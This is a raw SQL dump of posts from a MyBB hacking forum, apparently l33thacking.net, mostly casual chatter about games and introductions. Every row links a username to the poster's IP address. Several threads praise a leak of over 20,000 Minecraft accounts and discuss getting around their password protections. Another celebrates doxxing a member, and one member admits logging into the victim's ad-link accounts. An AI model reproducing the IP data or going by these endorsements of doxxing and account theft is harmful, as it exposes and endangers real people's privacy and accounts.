`uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6297', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '82', 'iTzIpod', '1351118410', 'Nevermind. Just downloaded it, scanned with MalwareBytes, and got no malicious items. Thanks! :D Installed all of them.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e84332f1fd453851cc77af60999e0066', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6298', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1351118458', 'I haven\'t posted any content in a while.. :/ Sorry for that. I\'m kinda busy these days.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a7be8a99514b56e5547f398bc90b2ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6299', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351122047', 'yeah it auto corrects lol i\'ve seen this plugin before on ewhore.pro', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '42bf65632e64cf9e6d8b1dde4183ad6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6300', '1083', '0', '4', 'Hey Guys', '0', '160', 'Jacob', '1351125122', 'I decided to make my Introduction thread, and here it is. I am an admin on MyBBSource, and an upgraded member on FK. I am also a moderater on NC. Hello, I joined a while ago, but I thought I would like to make my introduction thread.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '966a51e91c13effbd25b00b4f8b3bd6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6301', '1083', '6300', '4', 'RE: Hey Guys', '0', '82', 'iTzIpod', '1351125225', 'You haven\'t been active. But welcome back :) Enjoy your stay. Please be active on the forum. Hope you can probably try to advertise LH on other forums?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f4ae25adbff23056383ac7d546aa8d26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6302', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '160', 'Jacob', '1351125233', 'I dare you to try them :P But no, they cant change the pass because its already migrated, and you need to answer a security question answer to be able to change it.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '835d5bb837e6f76f172cee1f696231dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6303', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '82', 'iTzIpod', '1351125296', 'Actually, there was a way to bypass that. But I\'m not sure if Mojang fixed it or not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3299b795de4f25368748722df0dcec2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6304', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '2', 'Apathy', '1351127862', 'Nice share. Thanks man. :)', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '7e8453110ac390f3ea0eb32e764d4f3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6305', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1351130416', 'Lol yeh....and idk I think jok3r wanted it and it was a test for a member on NSA... :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '387cdb2d84d9014c975ccefcaf8ac5cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6306', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '257', 'XxTREYZxX', '1351130483', 'nice share but i will not be needing this :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'e820cb95cdc8acad259a96ac21f506aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6307', '976', '5459', '71', 'RE: Halo 4', '0', '291', 'xXGANNONXx', '1351130560', 'looks really good cant wait to buy it', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '7901f93bdb4d0456020c0f2953ebd013', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6308', '976', '5459', '71', 'RE: Halo 4', '0', '257', 'XxTREYZxX', '1351130681', 'yeah same i think its going to be great !', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9b8e51b711fbd31eea59380be95a498c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6309', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '291', 'xXGANNONXx', '1351130714', 'thanks for this its awesome :)', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', 'd0f2d69f1cd4c743688c4a2b6e2e9514', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6310', '1083', '6300', '4', 'RE: Hey Guys', '0', '257', 'XxTREYZxX', '1351130922', 'Yeah please be active mate :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '11ead7e645734e5eb70496d2f0ec80f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6311', '1084', '0', '4', 'hey guys', '0', '291', 'xXGANNONXx', '1351131193', 'hey guys im new to l33thacking.net ill will enjoy my stay', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '8a566544237fff594f14229677bb512a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6312', '1084', '6311', '4', 'RE: hey guys', '0', '257', 'XxTREYZxX', '1351131260', 'Sup my fellow friend whats happening bro, enjoy your stay mate :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'ec30666a47eec0e9cfea515cba8b8f04', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6313', '1085', '0', '71', '(help)optifine for minecraft', '0', '291', 'xXGANNONXx', '1351131536', 'hey LH, does anyone no a good website to get optifine from?', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '0bce21c1d553d6985ae533037a0bb8a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6314', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '61', 'NXK', '1351132102', 'It\'s legit, Good job NSA!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '67a2e014dce7087a1d406bba9bbd57b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6315', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1351132138', 'Hmm nice job but that is not nice for him. :P', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '3e3af4e62c32f825a6b1480e0ec626e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6316', '1086', '0', '75', 'Skyrim Cheats and tips', '0', '291', 'xXGANNONXx', '1351132358', '[color=#1E90FF][/color]hey LH, just giving you some tips and cheats to make your gaming experience more fun Infinite skill level gain This trick requires that you own a house with an alchemy lab. Obtain the Oghma Infinium book, but do not read it. Go to your house, and open the bookshelf. Read the Oghma Infinium book, then select the skill set to assign the skill gain. Close the book, but not the bookshelf. Store the book on the shelf, then take the book back off the shelf, and select it, but do not read it. Repeat this as many times as desired to get as much skill level gain as desired Duplicating apparel items Place any apparel item (armour or jewellery for best results) on a mannequin. Then, put the item back into your inventory. Leave the location of the mannequin, and go to a different area (for example, exit a house), then return to the mannequin to find the item still on the mannequin, which you can then take. Repeat this as many times as desired. Easy gold and Alchemy and Speech skills This trick requires some time to set up, but once it is done, you can get as much gold as desired. It requires the following: 1. Fortify Alchemy Enchantment 2. Helmet, gloves/bracers, two rings, and a necklace 3. Five Grand Soul Gems filled with Grand Souls. Grand Souls can be taken from Mammoths or bought. 4. The ingredients for Fortify Restoration potions: Abecean Longfins, Cyrodilic Spadetails, and Salt Piles. The fish can be obtained easily by swimming around Goldenglow Estate near Riften. Collect as many of these as you can, at least ten to fifteen of each ingredient. 5. Ingredients for a Fortify Enchanting potion: Snowberries, Spriggan Sap, Hagraven Claw, and Blue Butterfly Wing. hope you enjoy these tips and cheats :)', '203.104.11.14', '-882373874', '0', '0', '291', '1351132394', '1', '692dcff4509eefe23c67bff408483865', '0', '1351132394'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6317', '1086', '6316', '75', 'RE: Skyrim Cheats and tips', '0', '257', 'XxTREYZxX', '1351132446', 'Thanks mate for the great tips, nice and HQ', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '3bb8b434ad3bbef2b74fb7b58861a7dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6318', '1085', '6313', '71', 'RE: (help)optifine for minecraft', '0', '257', 'XxTREYZxX', '1351132483', 'Sorry mate i dont know much about optifine sorry :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'd032e539a1787de2f84c37085bb8a4aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6319', '1078', '6276', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1351132658', '[quote=\'iTzIpod\' pid=\'6276\' dateline=\'1351107524\'] Checked it out. Good job NSA! :) Why did you guys dox him though? He\'s a member of LH isn\'t he? Also, I checked his Adf.ly Account and the password was changed. Someone probably changed it due to his earnings or so. But I checked his Adfoc.us Account and it worked. But the earnings are meh. $0.00052 or something. Lol. [/quote] Yup he is a member but he leeched like 90% of L33T Hackings tutorials and programs and gave them out on Leakforums with his own credits and yes I mean credits= Kasual/Rave. NSA needed a test member so I said do it on him because he was not loyal, I requested him to take it down but refused and started spreading the leeched stuff on other sites so I thought NSA that he is a true scumbag.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ef9f31f26555bf7c116d2327a94efdf4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6320', '1083', '6300', '4', 'RE: Hey Guys', '0', '291', 'xXGANNONXx', '1351132695', 'hello bud, im new to :O hope you enjoy your stay :)', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '7b9b40e4de0bd70e584236f8bede1952', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6321', '1083', '6300', '4', 'RE: Hey Guys', '0', '1', 't3h jok3r', '1351132934', 'Welcome back jacob. Hope you are active.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ce5a3482e5b3af17026c4c75b70aa40e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6322', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1351133042', 'Yeh he deserved to be dox...luckily I had bee remove the details for an assload of his accounts. This is what happens when your an asshole online..', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c2b8eb6df47e6e983a226bef3540fbaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6323', '1087', '0', '74', 'GEARS OF WAR :P', '0', '257', 'XxTREYZxX', '1351133051', 'hey LH, gears of war :P [color=#DAA520] Do you play gears of war 3? Yes no 2. How often do you play it? Once a week every couple of months A few times a week Most days’ Every day I’ve played it a few times 3. What is your age? 10-15 years 15-20 years Above 20 years 4. What is your gender? Male female 5. What ethnicity are you? ……………………………………………………… 6. Did you play the previous gears of wars? Yes no 7. What is your favorite game mode? Campaign horde mode Beast mode online versus 8. What do you like about this particular game mode? ………………………………………………………………………………….. 9. What level are you online? 0-20 21-40 41-60 61-80 81-100 Prestige 10. If you could improve any part of the game what would it be? hope you enjoyed the test [/color]', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '146c83e083977824222e8f880009ae6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6324', '1083', '6300', '4', 'RE: Hey Guys', '0', '222', 'Exposé', '1351133217', 'Welcome Jacob to l33thacking. I hope you can be active and post some HQ content', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '2a5fe738dd032295c716a6d01abcb7c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6325', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1351134022', 'New group added.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20783203f7abd124523adc93cb442670', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6327', '1088', '0', '49', 'Best unique and useful suggestion', '0', '5', 'Timmy', '1351137172', 'Lets have a subforum inthe off topic section called misc tutorials. People will post tutorials on shit not covered on LH such as how to look good, how to bag whores, learning their laws, how to talk to a specific person, what to do when in trouble, how a car functions etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ab43ba8fbf5cfce474c0d9aa7f18d087', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6328', '1089', '0', '42', 'Homeless man saves officer from getting his ass whopped', '0', '5', 'Timmy', '1351137461', 'Video: http://news.yahoo.com/video/exclusive-homeless-man-saves-police-032800416.html Homeless man saves a officer in dallas from getting beaten up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '16adb660b6591ccf29c2aec94d94a6a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6329', '1090', '0', '8', 'What is this song called?', '0', '5', 'Timmy', '1351137598', 'There\'s a song in which people keep repeating the word \"black\"? I keep hearing some people mocking that song and I\'m curious.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '239e46b4f2770e319104441a73bb1315', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6330', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '7', 'Romdu62', '1351138078', 'I will SE the company :D You guys can pick any favorite company for chocolate and another different favorite drinks company. All you have to do is 5 refer people.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a0d97ce541f88d2d2aed0bad5002e96f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6331', '1058', '6090', '24', 'RE: Microsoft or Apple', '0', '7', 'Romdu62', '1351138173', 'Microfost for the win but they have weak security.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '479b3d23486819ee783c41ee94648039', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6332', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '222', 'Exposé', '1351139071', 'Not a bad suggestion.. I like it :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ee72a2578b3b961ec16543c4cd0d6e26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6333', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '257', 'XxTREYZxX', '1351142994', 'This a great suggestion. i say lets do it.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '6a080eed37bf0e69238d50a534e9d427', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6334', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '257', 'XxTREYZxX', '1351143111', 'i have referred one so far ; SO YEAH', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '46d5c91d1d52ab3ddf0cb97a317a3703', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6335', '1090', '6329', '8', 'RE: What is this song called?', '0', '257', 'XxTREYZxX', '1351143204', 'I thinks it\'s black and yellow. It goes:black and yellow,black and yellow and so on.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '2de2f418ddc0dd69452f95b580b2425b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6336', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '257', 'XxTREYZxX', '1351143276', 'What a brave homeless person :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '38d44a4e813d8d0e35b3151e9cd7fc0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6337', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '257', 'XxTREYZxX', '1351143441', 'Congratz virtual legend. hope you recruit some awesome members\\ good luck with recruiting :P maybe me hahaah', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '64341ca3b2e7fd4573e2ae3990b9d232', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6338', '1091', '0', '56', 'Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351143929', 'hello LH, and the game is rate the avatar above you.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '92c87150f38d34339976eaf2282aa925', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6339', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '222', 'Exposé', '1351151430', 'It\'s not too bad...kinda boring tho....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '50d4cee72d4fd7ddd51abbaf1dde91a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6340', '1092', '0', '82', 'Welcome New Members To The Marketers Palace', '17', '228', 'VirtualLegend', '1351151522', '[align=center][size=medium]Hello New Members of The Marketers Group. I just want to welcome all of the new members of the Marketers Group. What i ask of you is to post Good tutorials or Ebooks of money making content. Not only that i want you to help people out that are stuck with a problem or a question. And of course stay active and HQ because all of you are representing the group, so act like active and HQ member. All the Good threads about Monetizing must be posted in this Group. Have a Nice Day :P[/size][/align]', '81.18.248.110', '1360197742', '1', '0', '228', '1351367780', '1', 'fabe6492e6feb3e50f1b860b5f3a3a2b', '0', '1351367780'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6341', '1093', '0', '7', 'I\'m back', '0', '257', 'XxTREYZxX', '1351152283', 'hey guys im back, for some reason i was banned weird like what happened to virtual legend, i was worried as,but im back :P', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '7644cbc7a62f8fc80f02bdd8199662ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6342', '1091', '6339', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351152522', '[quote=\'Exposé\' pid=\'6339\' dateline=\'1351151430\'] It\'s not too bad...kinda boring tho.... [/quote] haha please rate outta /10 thanks ;P [hr] 8/10 CONSIDERING THAT ITS KINDA FUNNY AND ENTERAINING :p', '203.104.11.9', '-882373879', '1', '0', '257', '1351152561', '1', '67a2fa0587c9320af3b6629164888938', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6343', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1351154741', 'it could be better tbh :P 3/10', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 'e5f7e61a4a0c4122010d19cbb96e1315', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6344', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '62', 'R?????zo?', '1351154854', 'could be a great suggestion :)', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 'bf660fa72e1e55ab94dfa74aae77988a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6345', '1090', '6329', '8', 'RE: What is this song called?', '0', '62', 'R?????zo?', '1351154966', 'no idea, but you can try http://www.shazam.com/ and whenever you hear that song that will tell you the exact same name :P', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 